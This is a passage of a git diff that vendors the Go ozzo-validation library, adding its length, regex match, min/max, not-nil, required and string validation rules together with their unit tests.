+		{"UUIDv4", UUIDv4, "57b73598-8764-4ad0-a76a-679bb6640eb1", "b987fbc9-4bed-3078-cf07-9141ba07c9f3", "must be a valid UUID v4"},
+		{"UUIDv5", UUIDv5, "987fbc97-4bed-5078-af07-9141ba07c9f3", "b987fbc9-4bed-3078-cf07-9141ba07c9f3", "must be a valid UUID v5"},
+		{"MongoID", MongoID, "507f1f77bcf86cd799439011", "507f1f77bcf86cd79943901", "must be a valid hex-encoded MongoDB ObjectId"},
+		{"CreditCard", CreditCard, "375556917985515", "375556917985516", "must be a valid credit card number"},
+		{"JSON", JSON, "[1, 2]", "[1, 2,]", "must be in valid JSON format"},
+		{"ASCII", ASCII, "abc", "ａabc", "must contain ASCII characters only"},
+		{"PrintableASCII", PrintableASCII, "abc", "ａabc", "must contain printable ASCII characters only"},
+		{"CountryCode2", CountryCode2, "US", "XY", "must be a valid two-letter country code"},
+		{"CountryCode3", CountryCode3, "USA", "XYZ", "must be a valid three-letter country code"},
+		{"DialString", DialString, "localhost.local:1", "localhost.loc:100000", "must be a valid dial string"},
+		{"DataURI", DataURI, "data:image/png;base64,TG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFkaXBpc2NpbmcgZWxpdC4=", "image/gif;base64,U3VzcGVuZGlzc2UgbGVjdHVzIGxlbw==", "must be a Base64-encoded data URI"},
+		{"Base64", Base64, "TG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFkaXBpc2NpbmcgZWxpdC4=", "image", "must be encoded in Base64"},
+		{"Multibyte", Multibyte, "ａｂｃ", "abc", "must contain multibyte characters"},
+		{"FullWidth", FullWidth, "３ー０", "abc", "must contain full-width characters"},
+		{"HalfWidth", HalfWidth, "abc123い", "００１１", "must contain half-width characters"},
+		{"VariableWidth", VariableWidth, "３ー０123", "abc", "must contain both full-width and half-width characters"},
+		{"Hexadecimal", Hexadecimal, "FEF", "FTF", "must be a valid hexadecimal number"},
+		{"HexColor", HexColor, "F00", "FTF", "must be a valid hexadecimal color code"},
+		{"RGBColor", RGBColor, "rgb(100, 200, 1)", "abc", "must be a valid RGB color code"},
+		{"Int", Int, "100", "1.1", "must be an integer number"},
+		{"Float", Float, "1.1", "a.1", "must be a floating point number"},
+		{"VariableWidth", VariableWidth, "", "", ""},
+	}
+
+	for _, test := range tests {
+		err := test.rule.Validate("")
+		assert.Nil(t, err, test.tag)
+		err = test.rule.Validate(test.valid)
+		assert.Nil(t, err, test.tag)
+		err = test.rule.Validate(&test.valid)
+		assert.Nil(t, err, test.tag)
+		err = test.rule.Validate(test.invalid)
+		assertError(t, test.err, err, test.tag)
+		err = test.rule.Validate(&test.invalid)
+		assertError(t, test.err, err, test.tag)
+	}
+}
+
+func assertError(t *testing.T, expected string, err error, tag string) {
+	if expected == "" {
+		assert.Nil(t, err, tag)
+	} else if assert.NotNil(t, err, tag) {
+		assert.Equal(t, expected, err.Error(), tag)
+	}
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/length.go b/vendor/github.com/go-ozzo/ozzo-validation/length.go
new file mode 100644
index 0000000000..752df45d5e
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/length.go
@@ -0,0 +1,77 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"errors"
+	"fmt"
+	"unicode/utf8"
+)
+
+// Length returns a validation rule that checks if a value's length is within the specified range.
+// If max is 0, it means there is no upper bound for the length.
+// This rule should only be used for validating strings, slices, maps, and arrays.
+// An empty value is considered valid. Use the Required rule to make sure a value is not empty.
+func Length(min, max int) *lengthRule {
+	message := "the value must be empty"
+	if min == 0 && max > 0 {
+		message = fmt.Sprintf("the length must be no more than %v", max)
+	} else if min > 0 && max == 0 {
+		message = fmt.Sprintf("the length must be no less than %v", min)
+	} else if min > 0 && max > 0 {
+		message = fmt.Sprintf("the length must be between %v and %v", min, max)
+	}
+	return &lengthRule{
+		min:     min,
+		max:     max,
+		message: message,
+	}
+}
+
+// RuneLength returns a validation rule that checks if a string's rune length is within the specified range.
+// If max is 0, it means there is no upper bound for the length.
+// This rule should only be used for validating strings, slices, maps, and arrays.
+// An empty value is considered valid. Use the Required rule to make sure a value is not empty.
+// If the value being validated is not a string, the rule works the same as Length.
+func RuneLength(min, max int) *lengthRule {
+	r := Length(min, max)
+	r.rune = true
+	return r
+}
+
+type lengthRule struct {
+	min, max int
+	message  string
+	rune     bool
+}
+
+// Validate checks if the given value is valid or not.
+func (v *lengthRule) Validate(value interface{}) error {
+	value, isNil := Indirect(value)
+	if isNil || IsEmpty(value) {
+		return nil
+	}
+
+	var (
+		l   int
+		err error
+	)
+	if s, ok := value.(string); ok && v.rune {
+		l = utf8.RuneCountInString(s)
+	} else if l, err = LengthOfValue(value); err != nil {
+		return err
+	}
+
+	if v.min > 0 && l < v.min || v.max > 0 && l > v.max {
+		return errors.New(v.message)
+	}
+	return nil
+}
+
+// Error sets the error message for the rule.
+func (v *lengthRule) Error(message string) *lengthRule {
+	v.message = message
+	return v
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/length_test.go b/vendor/github.com/go-ozzo/ozzo-validation/length_test.go
new file mode 100644
index 0000000000..5eda7317cc
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/length_test.go
@@ -0,0 +1,90 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"database/sql"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestLength(t *testing.T) {
+	var v *string
+	tests := []struct {
+		tag      string
+		min, max int
+		value    interface{}
+		err      string
+	}{
+		{"t1", 2, 4, "abc", ""},
+		{"t2", 2, 4, "", ""},
+		{"t3", 2, 4, "abcdf", "the length must be between 2 and 4"},
+		{"t4", 0, 4, "ab", ""},
+		{"t5", 0, 4, "abcde", "the length must be no more than 4"},
+		{"t6", 2, 0, "ab", ""},
+		{"t7", 2, 0, "a", "the length must be no less than 2"},
+		{"t8", 2, 0, v, ""},
+		{"t9", 2, 0, 123, "cannot get the length of int"},
+		{"t10", 2, 4, sql.NullString{String: "abc", Valid: true}, ""},
+		{"t11", 2, 4, sql.NullString{String: "", Valid: true}, ""},
+		{"t12", 2, 4, &sql.NullString{String: "abc", Valid: true}, ""},
+	}
+
+	for _, test := range tests {
+		r := Length(test.min, test.max)
+		err := r.Validate(test.value)
+		assertError(t, test.err, err, test.tag)
+	}
+}
+
+func TestRuneLength(t *testing.T) {
+	var v *string
+	tests := []struct {
+		tag      string
+		min, max int
+		value    interface{}
+		err      string
+	}{
+		{"t1", 2, 4, "abc", ""},
+		{"t1.1", 2, 3, "💥💥", ""},
+		{"t1.2", 2, 3, "💥💥💥", ""},
+		{"t1.3", 2, 3, "💥", "the length must be between 2 and 3"},
+		{"t1.4", 2, 3, "💥💥💥💥", "the length must be between 2 and 3"},
+		{"t2", 2, 4, "", ""},
+		{"t3", 2, 4, "abcdf", "the length must be between 2 and 4"},
+		{"t4", 0, 4, "ab", ""},
+		{"t5", 0, 4, "abcde", "the length must be no more than 4"},
+		{"t6", 2, 0, "ab", ""},
+		{"t7", 2, 0, "a", "the length must be no less than 2"},
+		{"t8", 2, 0, v, ""},
+		{"t9", 2, 0, 123, "cannot get the length of int"},
+		{"t10", 2, 4, sql.NullString{String: "abc", Valid: true}, ""},
+		{"t11", 2, 4, sql.NullString{String: "", Valid: true}, ""},
+		{"t12", 2, 4, &sql.NullString{String: "abc", Valid: true}, ""},
+		{"t13", 2, 3, &sql.NullString{String: "💥💥", Valid: true}, ""},
+		{"t14", 2, 3, &sql.NullString{String: "💥", Valid: true}, "the length must be between 2 and 3"},
+	}
+
+	for _, test := range tests {
+		r := RuneLength(test.min, test.max)
+		err := r.Validate(test.value)
+		assertError(t, test.err, err, test.tag)
+	}
+}
+
+func Test_lengthRule_Error(t *testing.T) {
+	r := Length(10, 20)
+	assert.Equal(t, "the length must be between 10 and 20", r.message)
+
+	r = Length(0, 20)
+	assert.Equal(t, "the length must be no more than 20", r.message)
+
+	r = Length(10, 0)
+	assert.Equal(t, "the length must be no less than 10", r.message)
+
+	r.Error("123")
+	assert.Equal(t, "123", r.message)
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/match.go b/vendor/github.com/go-ozzo/ozzo-validation/match.go
new file mode 100644
index 0000000000..02aa4fb62c
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/match.go
@@ -0,0 +1,47 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"errors"
+	"regexp"
+)
+
+// Match returns a validation rule that checks if a value matches the specified regular expression.
+// This rule should only be used for validating strings and byte slices, or a validation error will be reported.
+// An empty value is considered valid. Use the Required rule to make sure a value is not empty.
+func Match(re *regexp.Regexp) *matchRule {
+	return &matchRule{
+		re:      re,
+		message: "must be in a valid format",
+	}
+}
+
+type matchRule struct {
+	re      *regexp.Regexp
+	message string
+}
+
+// Validate checks if the given value is valid or not.
+func (v *matchRule) Validate(value interface{}) error {
+	value, isNil := Indirect(value)
+	if isNil {
+		return nil
+	}
+
+	isString, str, isBytes, bs := StringOrBytes(value)
+	if isString && (str == "" || v.re.MatchString(str)) {
+		return nil
+	} else if isBytes && (len(bs) == 0 || v.re.Match(bs)) {
+		return nil
+	}
+	return errors.New(v.message)
+}
+
+// Error sets the error message for the rule.
+func (v *matchRule) Error(message string) *matchRule {
+	v.message = message
+	return v
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/match_test.go b/vendor/github.com/go-ozzo/ozzo-validation/match_test.go
new file mode 100644
index 0000000000..98075e658a
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/match_test.go
@@ -0,0 +1,44 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"regexp"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestMatch(t *testing.T) {
+	var v2 *string
+	tests := []struct {
+		tag   string
+		re    string
+		value interface{}
+		err   string
+	}{
+		{"t1", "[a-z]+", "abc", ""},
+		{"t2", "[a-z]+", "", ""},
+		{"t3", "[a-z]+", v2, ""},
+		{"t4", "[a-z]+", "123", "must be in a valid format"},
+		{"t5", "[a-z]+", []byte("abc"), ""},
+		{"t6", "[a-z]+", []byte("123"), "must be in a valid format"},
+		{"t7", "[a-z]+", []byte(""), ""},
+		{"t8", "[a-z]+", nil, ""},
+	}
+
+	for _, test := range tests {
+		r := Match(regexp.MustCompile(test.re))
+		err := r.Validate(test.value)
+		assertError(t, test.err, err, test.tag)
+	}
+}
+
+func Test_matchRule_Error(t *testing.T) {
+	r := Match(regexp.MustCompile("[a-z]+"))
+	assert.Equal(t, "must be in a valid format", r.message)
+	r.Error("123")
+	assert.Equal(t, "123", r.message)
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/minmax.go b/vendor/github.com/go-ozzo/ozzo-validation/minmax.go
new file mode 100644
index 0000000000..952bd1c4fc
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/minmax.go
@@ -0,0 +1,177 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"errors"
+	"fmt"
+	"reflect"
+	"time"
+)
+
+type thresholdRule struct {
+	threshold interface{}
+	operator  int
+	message   string
+}
+
+const (
+	greaterThan = iota
+	greaterEqualThan
+	lessThan
+	lessEqualThan
+)
+
+// Min is a validation rule that checks if a value is greater or equal than the specified value.
+// By calling Exclusive, the rule will check if the value is strictly greater than the specified value.
+// Note that the value being checked and the threshold value must be of the same type.
+// Only int, uint, float and time.Time types are supported.
+// An empty value is considered valid. Please use the Required rule to make sure a value is not empty.
+func Min(min interface{}) *thresholdRule {
+	return &thresholdRule{
+		threshold: min,
+		operator:  greaterEqualThan,
+		message:   fmt.Sprintf("must be no less than %v", min),
+	}
+}
+
+// Max is a validation rule that checks if a value is less or equal than the specified value.
+// By calling Exclusive, the rule will check if the value is strictly less than the specified value.
+// Note that the value being checked and the threshold value must be of the same type.
+// Only int, uint, float and time.Time types are supported.
+// An empty value is considered valid. Please use the Required rule to make sure a value is not empty.
+func Max(max interface{}) *thresholdRule {
+	return &thresholdRule{
+		threshold: max,
+		operator:  lessEqualThan,
+		message:   fmt.Sprintf("must be no greater than %v", max),
+	}
+}
+
+// Exclusive sets the comparison to exclude the boundary value.
+func (r *thresholdRule) Exclusive() *thresholdRule {
+	if r.operator == greaterEqualThan {
+		r.operator = greaterThan
+		r.message = fmt.Sprintf("must be greater than %v", r.threshold)
+	} else if r.operator == lessEqualThan {
+		r.operator = lessThan
+		r.message = fmt.Sprintf("must be less than %v", r.threshold)
+	}
+	return r
+}
+
+// Validate checks if the given value is valid or not.
+func (r *thresholdRule) Validate(value interface{}) error {
+	value, isNil := Indirect(value)
+	if isNil || IsEmpty(value) {
+		return nil
+	}
+
+	rv := reflect.ValueOf(r.threshold)
+	switch rv.Kind() {
+	case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64:
+		v, err := ToInt(value)
+		if err != nil {
+			return err
+		}
+		if r.compareInt(rv.Int(), v) {
+			return nil
+		}
+
+	case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr:
+		v, err := ToUint(value)
+		if err != nil {
+			return err
+		}
+		if r.compareUint(rv.Uint(), v) {
+			return nil
+		}
+
+	case reflect.Float32, reflect.Float64:
+		v, err := ToFloat(value)
+		if err != nil {
+			return err
+		}
+		if r.compareFloat(rv.Float(), v) {
+			return nil
+		}
+
+	case reflect.Struct:
+		t, ok := r.threshold.(time.Time)
+		if !ok {
+			return fmt.Errorf("type not supported: %v", rv.Type())
+		}
+		v, ok := value.(time.Time)
+		if !ok {
+			return fmt.Errorf("cannot convert %v to time.Time", reflect.TypeOf(value))
+		}
+		if v.IsZero() || r.compareTime(t, v) {
+			return nil
+		}
+
+	default:
+		return fmt.Errorf("type not supported: %v", rv.Type())
+	}
+
+	return errors.New(r.message)
+}
+
+// Error sets the error message for the rule.
+func (r *thresholdRule) Error(message string) *thresholdRule {
+	r.message = message
+	return r
+}
+
+func (r *thresholdRule) compareInt(threshold, value int64) bool {
+	switch r.operator {
+	case greaterThan:
+		return value > threshold
+	case greaterEqualThan:
+		return value >= threshold
+	case lessThan:
+		return value < threshold
+	default:
+		return value <= threshold
+	}
+}
+
+func (r *thresholdRule) compareUint(threshold, value uint64) bool {
+	switch r.operator {
+	case greaterThan:
+		return value > threshold
+	case greaterEqualThan:
+		return value >= threshold
+	case lessThan:
+		return value < threshold
+	default:
+		return value <= threshold
+	}
+}
+
+func (r *thresholdRule) compareFloat(threshold, value float64) bool {
+	switch r.operator {
+	case greaterThan:
+		return value > threshold
+	case greaterEqualThan:
+		return value >= threshold
+	case lessThan:
+		return value < threshold
+	default:
+		return value <= threshold
+	}
+}
+
+func (r *thresholdRule) compareTime(threshold, value time.Time) bool {
+	switch r.operator {
+	case greaterThan:
+		return value.After(threshold)
+	case greaterEqualThan:
+		return value.After(threshold) || value.Equal(threshold)
+	case lessThan:
+		return value.Before(threshold)
+	default:
+		return value.Before(threshold) || value.Equal(threshold)
+	}
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/minmax_test.go b/vendor/github.com/go-ozzo/ozzo-validation/minmax_test.go
new file mode 100644
index 0000000000..562757f5d8
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/minmax_test.go
@@ -0,0 +1,137 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+	"time"
+)
+
+func TestMin(t *testing.T) {
+	date0 := time.Time{}
+	date20000101 := time.Date(2000, 1, 1, 0, 0, 0, 0, time.UTC)
+	date20001201 := time.Date(2000, 12, 1, 0, 0, 0, 0, time.UTC)
+	date20000601 := time.Date(2000, 6, 1, 0, 0, 0, 0, time.UTC)
+
+	tests := []struct {
+		tag       string
+		threshold interface{}
+		exclusive bool
+		value     interface{}
+		err       string
+	}{
+		// int cases
+		{"t1.1", 1, false, 1, ""},
+		{"t1.2", 1, false, 2, ""},
+		{"t1.3", 1, false, -1, "must be no less than 1"},
+		{"t1.4", 1, false, 0, ""},
+		{"t1.5", 1, true, 1, "must be greater than 1"},
+		{"t1.6", 1, false, "1", "cannot convert string to int64"},
+		{"t1.7", "1", false, 1, "type not supported: string"},
+		// uint cases
+		{"t2.1", uint(2), false, uint(2), ""},
+		{"t2.2", uint(2), false, uint(3), ""},
+		{"t2.3", uint(2), false, uint(1), "must be no less than 2"},
+		{"t2.4", uint(2), false, uint(0), ""},
+		{"t2.5", uint(2), true, uint(2), "must be greater than 2"},
+		{"t2.6", uint(2), false, "1", "cannot convert string to uint64"},
+		// float cases
+		{"t3.1", float64(2), false, float64(2), ""},
+		{"t3.2", float64(2), false, float64(3), ""},
+		{"t3.3", float64(2), false, float64(1), "must be no less than 2"},
+		{"t3.4", float64(2), false, float64(0), ""},
+		{"t3.5", float64(2), true, float64(2), "must be greater than 2"},
+		{"t3.6", float64(2), false, "1", "cannot convert string to float64"},
+		// Time cases
+		{"t4.1", date20000601, false, date20000601, ""},
+		{"t4.2", date20000601, false, date20001201, ""},
+		{"t4.3", date20000601, false, date20000101, "must be no less than 2000-06-01 00:00:00 +0000 UTC"},
+		{"t4.4", date20000601, false, date0, ""},
+		{"t4.5", date20000601, true, date20000601, "must be greater than 2000-06-01 00:00:00 +0000 UTC"},
+		{"t4.6", date20000601, true, 1, "cannot convert int to time.Time"},
+		{"t4.7", struct{}{}, false, 1, "type not supported: struct {}"},
+	}
+
+	for _, test := range tests {
+		r := Min(test.threshold)
+		if test.exclusive {
+			r.Exclusive()
+		}
+		err := r.Validate(test.value)
+		assertError(t, test.err, err, test.tag)
+	}
+}
+
+func TestMinError(t *testing.T) {
+	r := Min(10)
+	assert.Equal(t, "must be no less than 10", r.message)
+
+	r.Error("123")
+	assert.Equal(t, "123", r.message)
+}
+
+func TestMax(t *testing.T) {
+	date0 := time.Time{}
+	date20000101 := time.Date(2000, 1, 1, 0, 0, 0, 0, time.UTC)
+	date20001201 := time.Date(2000, 12, 1, 0, 0, 0, 0, time.UTC)
+	date20000601 := time.Date(2000, 6, 1, 0, 0, 0, 0, time.UTC)
+
+	tests := []struct {
+		tag       string
+		threshold interface{}
+		exclusive bool
+		value     interface{}
+		err       string
+	}{
+		// int cases
+		{"t1.1", 2, false, 2, ""},
+		{"t1.2", 2, false, 1, ""},
+		{"t1.3", 2, false, 3, "must be no greater than 2"},
+		{"t1.4", 2, false, 0, ""},
+		{"t1.5", 2, true, 2, "must be less than 2"},
+		{"t1.6", 2, false, "1", "cannot convert string to int64"},
+		{"t1.7", "1", false, 1, "type not supported: string"},
+		// uint cases
+		{"t2.1", uint(2), false, uint(2), ""},
+		{"t2.2", uint(2), false, uint(1), ""},
+		{"t2.3", uint(2), false, uint(3), "must be no greater than 2"},
+		{"t2.4", uint(2), false, uint(0), ""},
+		{"t2.5", uint(2), true, uint(2), "must be less than 2"},
+		{"t2.6", uint(2), false, "1", "cannot convert string to uint64"},
+		// float cases
+		{"t3.1", float64(2), false, float64(2), ""},
+		{"t3.2", float64(2), false, float64(1), ""},
+		{"t3.3", float64(2), false, float64(3), "must be no greater than 2"},
+		{"t3.4", float64(2), false, float64(0), ""},
+		{"t3.5", float64(2), true, float64(2), "must be less than 2"},
+		{"t3.6", float64(2), false, "1", "cannot convert string to float64"},
+		// Time cases
+		{"t4.1", date20000601, false, date20000601, ""},
+		{"t4.2", date20000601, false, date20000101, ""},
+		{"t4.3", date20000601, false, date20001201, "must be no greater than 2000-06-01 00:00:00 +0000 UTC"},
+		{"t4.4", date20000601, false, date0, ""},
+		{"t4.5", date20000601, true, date20000601, "must be less than 2000-06-01 00:00:00 +0000 UTC"},
+		{"t4.6", date20000601, true, 1, "cannot convert int to time.Time"},
+	}
+
+	for _, test := range tests {
+		r := Max(test.threshold)
+		if test.exclusive {
+			r.Exclusive()
+		}
+		err := r.Validate(test.value)
+		assertError(t, test.err, err, test.tag)
+	}
+}
+
+func TestMaxError(t *testing.T) {
+	r := Max(10)
+	assert.Equal(t, "must be no greater than 10", r.message)
+
+	r.Error("123")
+	assert.Equal(t, "123", r.message)
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/not_nil.go b/vendor/github.com/go-ozzo/ozzo-validation/not_nil.go
new file mode 100644
index 0000000000..6cfca1204a
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/not_nil.go
@@ -0,0 +1,32 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import "errors"
+
+// NotNil is a validation rule that checks if a value is not nil.
+// NotNil only handles types including interface, pointer, slice, and map.
+// All other types are considered valid.
+var NotNil = &notNilRule{message: "is required"}
+
+type notNilRule struct {
+	message string
+}
+
+// Validate checks if the given value is valid or not.
+func (r *notNilRule) Validate(value interface{}) error {
+	_, isNil := Indirect(value)
+	if isNil {
+		return errors.New(r.message)
+	}
+	return nil
+}
+
+// Error sets the error message for the rule.
+func (r *notNilRule) Error(message string) *notNilRule {
+	return &notNilRule{
+		message: message,
+	}
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/not_nil_test.go b/vendor/github.com/go-ozzo/ozzo-validation/not_nil_test.go
new file mode 100644
index 0000000000..4821da531c
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/not_nil_test.go
@@ -0,0 +1,50 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+type MyInterface interface {
+	Hello()
+}
+
+func TestNotNil(t *testing.T) {
+	var v1 []int
+	var v2 map[string]int
+	var v3 *int
+	var v4 interface{}
+	var v5 MyInterface
+	tests := []struct {
+		tag   string
+		value interface{}
+		err   string
+	}{
+		{"t1", v1, "is required"},
+		{"t2", v2, "is required"},
+		{"t3", v3, "is required"},
+		{"t4", v4, "is required"},
+		{"t5", v5, "is required"},
+		{"t6", "", ""},
+		{"t7", 0, ""},
+	}
+
+	for _, test := range tests {
+		r := NotNil
+		err := r.Validate(test.value)
+		assertError(t, test.err, err, test.tag)
+	}
+}
+
+func Test_notNilRule_Error(t *testing.T) {
+	r := NotNil
+	assert.Equal(t, "is required", r.message)
+	r2 := r.Error("123")
+	assert.Equal(t, "is required", r.message)
+	assert.Equal(t, "123", r2.message)
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/required.go b/vendor/github.com/go-ozzo/ozzo-validation/required.go
new file mode 100644
index 0000000000..ef9558e025
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/required.go
@@ -0,0 +1,42 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import "errors"
+
+// Required is a validation rule that checks if a value is not empty.
+// A value is considered not empty if
+// - integer, float: not zero
+// - bool: true
+// - string, array, slice, map: len() > 0
+// - interface, pointer: not nil and the referenced value is not empty
+// - any other types
+var Required = &requiredRule{message: "cannot be blank", skipNil: false}
+
+// NilOrNotEmpty checks if a value is a nil pointer or a value that is not empty.
+// NilOrNotEmpty differs from Required in that it treats a nil pointer as valid.
+var NilOrNotEmpty = &requiredRule{message: "cannot be blank", skipNil: true}
+
+type requiredRule struct {
+	message string
+	skipNil bool
+}
+
+// Validate checks if the given value is valid or not.
+func (v *requiredRule) Validate(value interface{}) error {
+	value, isNil := Indirect(value)
+	if v.skipNil && !isNil && IsEmpty(value) || !v.skipNil && (isNil || IsEmpty(value)) {
+		return errors.New(v.message)
+	}
+	return nil
+}
+
+// Error sets the error message for the rule.
+func (v *requiredRule) Error(message string) *requiredRule {
+	return &requiredRule{
+		message: message,
+		skipNil: v.skipNil,
+	}
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/required_test.go b/vendor/github.com/go-ozzo/ozzo-validation/required_test.go
new file mode 100644
index 0000000000..c85e412149
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/required_test.go
@@ -0,0 +1,75 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestRequired(t *testing.T) {
+	s1 := "123"
+	s2 := ""
+	tests := []struct {
+		tag   string
+		value interface{}
+		err   string
+	}{
+		{"t1", 123, ""},
+		{"t2", "", "cannot be blank"},
+		{"t3", &s1, ""},
+		{"t4", &s2, "cannot be blank"},
+		{"t5", nil, "cannot be blank"},
+	}
+
+	for _, test := range tests {
+		r := Required
+		err := r.Validate(test.value)
+		assertError(t, test.err, err, test.tag)
+	}
+}
+
+func TestNilOrNotEmpty(t *testing.T) {
+	s1 := "123"
+	s2 := ""
+	tests := []struct {
+		tag   string
+		value interface{}
+		err   string
+	}{
+		{"t1", 123, ""},
+		{"t2", "", "cannot be blank"},
+		{"t3", &s1, ""},
+		{"t4", &s2, "cannot be blank"},
+		{"t5", nil, ""},
+	}
+
+	for _, test := range tests {
+		r := NilOrNotEmpty
+		err := r.Validate(test.value)
+		assertError(t, test.err, err, test.tag)
+	}
+}
+
+func Test_requiredRule_Error(t *testing.T) {
+	r := Required
+	assert.Equal(t, "cannot be blank", r.message)
+	assert.False(t, r.skipNil)
+	r2 := r.Error("123")
+	assert.Equal(t, "cannot be blank", r.message)
+	assert.False(t, r.skipNil)
+	assert.Equal(t, "123", r2.message)
+	assert.False(t, r2.skipNil)
+
+	r = NilOrNotEmpty
+	assert.Equal(t, "cannot be blank", r.message)
+	assert.True(t, r.skipNil)
+	r2 = r.Error("123")
+	assert.Equal(t, "cannot be blank", r.message)
+	assert.True(t, r.skipNil)
+	assert.Equal(t, "123", r2.message)
+	assert.True(t, r2.skipNil)
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/string.go b/vendor/github.com/go-ozzo/ozzo-validation/string.go
new file mode 100644
index 0000000000..e8f2a5e749
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/string.go
@@ -0,0 +1,48 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import "errors"
+
+type stringValidator func(string) bool
+
+// StringRule is a rule that checks a string variable using a specified stringValidator.
+type StringRule struct {
+	validate stringValidator
+	message  string
+}
+
+// NewStringRule creates a new validation rule using a function that takes a string value and returns a bool.
+// The rule returned will use the function to check if a given string or byte slice is valid or not.
+// An empty value is considered to be valid. Please use the Required rule to make sure a value is not empty.
+func NewStringRule(validator stringValidator, message string) *StringRule {
+	return &StringRule{
+		validate: validator,
+		message:  message,
+	}
+}
+
+// Error sets the error message for the rule.
+func (v *StringRule) Error(message string) *StringRule {
+	return NewStringRule(v.validate, message)
+}
+
+// Validate checks if the given value is valid or not.
+func (v *StringRule) Validate(value interface{}) error {
+	value, isNil := Indirect(value)
+	if isNil || IsEmpty(value) {
+		return nil
+	}
+
+	str, err := EnsureString(value)
+	if err != nil {
+		return err
+	}
+
+	if v.validate(str) {
+		return nil
+	}
+	return errors.New(v.message)
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/string_test.go b/vendor/github.com/go-ozzo/ozzo-validation/string_test.go
new file mode 100644
index 0000000000..80da2286d9
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/string_test.go
@@ -0,0 +1,106 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"database/sql"
+	"testing"
+
+	"reflect"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func validateMe(s string) bool {
+	return s == "me"
+}
+
+func TestNewStringRule(t *testing.T) {
+	v := NewStringRule(validateMe, "abc")
+	assert.NotNil(t, v.validate)
+	assert.Equal(t, "abc", v.message)
+}
+
+func TestStringValidator_Error(t *testing.T) {
+	v := NewStringRule(validateMe, "abc")
+	assert.Equal(t, "abc", v.message)
+	v2 := v.Error("correct")
+	assert.Equal(t, "correct", v2.message)
+	assert.Equal(t, "abc", v.message)
+}
+
+func TestStringValidator_Validate(t *testing.T) {
+	v := NewStringRule(validateMe, "wrong")
+
+	value := "me"
+
+	err := v.Validate(value)
+	assert.Nil(t, err)
+
+	err = v.Validate(&value)
+	assert.Nil(t, err)
+
+	value = ""
+
+	err = v.Validate(value)
+	assert.Nil(t, err)
+
+	err = v.Validate(&value)
+	assert.Nil(t, err)
+
+	nullValue := sql.NullString{String: "me", Valid: true}
+	err = v.Validate(nullValue)
+	assert.Nil(t, err)
+
+	nullValue = sql.NullString{String: "", Valid: true}
+	err = v.Validate(nullValue)
+	assert.Nil(t, err)
+
+	var s *string
+	err = v.Validate(s)
+	assert.Nil(t, err)
+
+	err = v.Validate("not me")
+	if assert.NotNil(t, err) {
+		assert.Equal(t, "wrong", err.Error())
+	}
+
